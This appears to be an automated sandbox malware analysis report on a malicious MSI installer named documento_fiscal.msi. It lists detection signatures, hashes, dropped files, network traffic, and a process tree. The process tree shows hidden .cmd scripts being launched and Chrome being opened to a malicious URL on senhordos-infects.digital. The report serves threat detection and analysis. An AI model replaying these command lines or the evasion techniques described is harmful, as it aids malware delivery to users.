Edit tour

Windows Analysis Report
documento_fiscal.msi

Overview

General Information

Sample name:	documento_fiscal.msi
Analysis ID:	1487498
MD5:	1f5f238e8fe77c8d8223c447d47af966
SHA1:	d54cef3a2624e20e1ea10d01a93c0ca315ae8d2b
SHA256:	0845f3988ace37d012b1838a5f56193bf46f9844bc7be983c0baa693527fd472
Tags:	msi
Infos:

Detection

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Drops executables to the windows directory (C:\Windows) and starts them

Machine Learning detection for dropped file

PE file contains section with special chars

Checks for available system drives (often done to infect USB drives)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Launches processes in debugging mode, may be used to hinder debugging

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

msiexec.exe (PID: 7256 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\documento_fiscal.msi" MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 7292 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 7356 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 5BA47DE34B5A6DEE60D2C5FA45A6276E MD5: 9D09DC1EDA745A5F87553048E57620CF)

MSI892F.tmp (PID: 7488 cmdline: "C:\Windows\Installer\MSI892F.tmp" /DontWait "C:\Users\user\Documents\microsoft.cmd" C:\Users\user\Documents\ MD5: 768B35409005592DE2333371C6253BC8)

MSI894F.tmp (PID: 7508 cmdline: "C:\Windows\Installer\MSI894F.tmp" /HideWindow "C:\Users\user\AppData\Roaming\Defendr\cont.cmd" C:\Users\user\AppData\Roaming\Defendr\ MD5: 768B35409005592DE2333371C6253BC8)

cmd.exe (PID: 7532 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Documents\microsoft.cmd" C:\Users\user\Documents\" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7612 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Defendr\cont.cmd" C:\Users\user\AppData\Roaming\Defendr\" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chrome.exe (PID: 7684 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://senhordos-infects.digital/clientesnew/inspecionando.php MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7912 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1876,i,4535856844853309651,5125483809637210346,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 04 Aug 2024 11:59:09 GMTServer: Apache/2.4.52 (Ubuntu)Content-Length: 287Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6e 68 6f 72 64 6f 73 2d 69 6e 66 65 63 74 73 2e 64 69 67 69 74 61 6c 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at senhordos-infects.digital Port 80</address></body></html>

Source: documento_fiscal.msi

String found in binary or memory: http://senhordos-infects.digital/clientesnew/inspecionando.php

Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49748 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: AGLoader.dll.1.dr	Static PE information: section name: .L<L
Source: AGLoader.dll.1.dr	Static PE information: section name: .yK!

Source: C:\Windows\Installer\MSI894F.tmp

Code function: 4_2_00D465B0 GetProcAddress,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,LocalFree,GetLastError,FreeLibrary,

4_2_00D465B0

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\58791b.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI7BCB.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI7C59.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI7C88.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI7CA9.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI7CF8.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{84A29AC3-6CE2-4D4C-A459-E583C2AFC8C9}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI7F79.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI892F.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI894F.tmp	Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSI7BCB.tmp

Jump to behavior

Source: C:\Windows\Installer\MSI892F.tmp	Code function: 3_2_001C6078	3_2_001C6078
Source: C:\Windows\Installer\MSI892F.tmp	Code function: 3_2_0019D060	3_2_0019D060
Source: C:\Windows\Installer\MSI892F.tmp	Code function: 3_2_001CB336	3_2_001CB336
Source: C:\Windows\Installer\MSI892F.tmp	Code function: 3_2_001D4609	3_2_001D4609
Source: C:\Windows\Installer\MSI892F.tmp	Code function: 3_2_001BF700	3_2_001BF700
Source: C:\Windows\Installer\MSI892F.tmp	Code function: 3_2_001B9730	3_2_001B9730
Source: C:\Windows\Installer\MSI892F.tmp	Code function: 3_2_001C38A0	3_2_001C38A0
Source: C:\Windows\Installer\MSI892F.tmp	Code function: 3_2_001C18EF	3_2_001C18EF
Source: C:\Windows\Installer\MSI892F.tmp	Code function: 3_2_001CE919	3_2_001CE919
Source: C:\Windows\Installer\MSI892F.tmp	Code function: 3_2_001BFA8E	3_2_001BFA8E
Source: C:\Windows\Installer\MSI892F.tmp	Code function: 3_2_001CDB30	3_2_001CDB30
Source: C:\Windows\Installer\MSI892F.tmp	Code function: 3_2_001A0E90	3_2_001A0E90
Source: C:\Windows\Installer\MSI894F.tmp	Code function: 4_2_00D76078	4_2_00D76078
Source: C:\Windows\Installer\MSI894F.tmp	Code function: 4_2_00D4D060	4_2_00D4D060
Source: C:\Windows\Installer\MSI894F.tmp	Code function: 4_2_00D7B336	4_2_00D7B336
Source: C:\Windows\Installer\MSI894F.tmp	Code function: 4_2_00D84609	4_2_00D84609
Source: C:\Windows\Installer\MSI894F.tmp	Code function: 4_2_00D6F700	4_2_00D6F700
Source: C:\Windows\Installer\MSI894F.tmp	Code function: 4_2_00D69730	4_2_00D69730
Source: C:\Windows\Installer\MSI894F.tmp	Code function: 4_2_00D718EF	4_2_00D718EF
Source: C:\Windows\Installer\MSI894F.tmp	Code function: 4_2_00D738A0	4_2_00D738A0
Source: C:\Windows\Installer\MSI894F.tmp	Code function: 4_2_00D7E919	4_2_00D7E919
Source: C:\Windows\Installer\MSI894F.tmp	Code function: 4_2_00D6FA8E	4_2_00D6FA8E
Source: C:\Windows\Installer\MSI894F.tmp	Code function: 4_2_00D7DB30	4_2_00D7DB30
Source: C:\Windows\Installer\MSI894F.tmp	Code function: 4_2_00D50E90	4_2_00D50E90

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\Defendr\LKdayanJELT9QDD900055.exe 7FA7499C7A72041D7D0FB1E4659466AD8D428080A176FA16276FD60ADC9DA0FD
Source: Joe Sandbox View	Dropped File: C:\Windows\Installer\MSI7BCB.tmp 42EF18C42FE06709F3C86157E2270358F3C93D14BE2E173B8FAE8EDCEFDDFCA0

Source: C:\Windows\Installer\MSI894F.tmp	Code function: String function: 00D685D0 appears 39 times
Source: C:\Windows\Installer\MSI894F.tmp	Code function: String function: 00D68213 appears 100 times
Source: C:\Windows\Installer\MSI894F.tmp	Code function: String function: 00D68246 appears 67 times
Source: C:\Windows\Installer\MSI892F.tmp	Code function: String function: 001B8246 appears 67 times
Source: C:\Windows\Installer\MSI892F.tmp	Code function: String function: 001B85D0 appears 39 times
Source: C:\Windows\Installer\MSI892F.tmp	Code function: String function: 001B8213 appears 100 times

Source: AGLoader.dll.1.dr

Static PE information: Number of sections : 12 > 10

Source: documento_fiscal.msi	Binary or memory string: OriginalFilenameviewer.exeF vs documento_fiscal.msi
Source: documento_fiscal.msi	Binary or memory string: OriginalFilenameAICustAct.dllF vs documento_fiscal.msi

Source: classification engine

Classification label: mal80.evad.winMSI@27/144@4/4

Source: C:\Windows\Installer\MSI892F.tmp

Code function: 3_2_001961D0 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle,

3_2_001961D0

Source: C:\Windows\Installer\MSI892F.tmp

Code function: 3_2_00196EE0 CoInitialize,CoCreateInstance,VariantInit,VariantClear,IUnknown_QueryService,IUnknown_QueryInterface_Proxy,IUnknown_QueryInterface_Proxy,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantInit,LocalFree,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error,

3_2_00196EE0

Source: C:\Windows\Installer\MSI892F.tmp

Code function: 3_2_00191D70 LoadResource,LockResource,SizeofResource,

3_2_00191D70

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\CML8020.tmp

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Local\Temp\MSI87812.LOG

Jump to behavior

Source: C:\Windows\Installer\MSI892F.tmp

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: documento_fiscal.msi	ReversingLabs: Detection: 42%
Source: documento_fiscal.msi	Virustotal: Detection: 50%

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\documento_fiscal.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 5BA47DE34B5A6DEE60D2C5FA45A6276E
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSI892F.tmp "C:\Windows\Installer\MSI892F.tmp" /DontWait "C:\Users\user\Documents\microsoft.cmd" C:\Users\user\Documents\
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSI894F.tmp "C:\Windows\Installer\MSI894F.tmp" /HideWindow "C:\Users\user\AppData\Roaming\Defendr\cont.cmd" C:\Users\user\AppData\Roaming\Defendr\
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Documents\microsoft.cmd" C:\Users\user\Documents\"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Defendr\cont.cmd" C:\Users\user\AppData\Roaming\Defendr\"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://senhordos-infects.digital/clientesnew/inspecionando.php
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1876,i,4535856844853309651,5125483809637210346,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 5BA47DE34B5A6DEE60D2C5FA45A6276E	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSI892F.tmp "C:\Windows\Installer\MSI892F.tmp" /DontWait "C:\Users\user\Documents\microsoft.cmd" C:\Users\user\Documents\	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSI894F.tmp "C:\Windows\Installer\MSI894F.tmp" /HideWindow "C:\Users\user\AppData\Roaming\Defendr\cont.cmd" C:\Users\user\AppData\Roaming\Defendr\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://senhordos-infects.digital/clientesnew/inspecionando.php	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1876,i,4535856844853309651,5125483809637210346,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.ui.immersive.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Installer\MSI892F.tmp	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\Installer\MSI892F.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Installer\MSI892F.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Installer\MSI892F.tmp	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Installer\MSI892F.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Installer\MSI892F.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
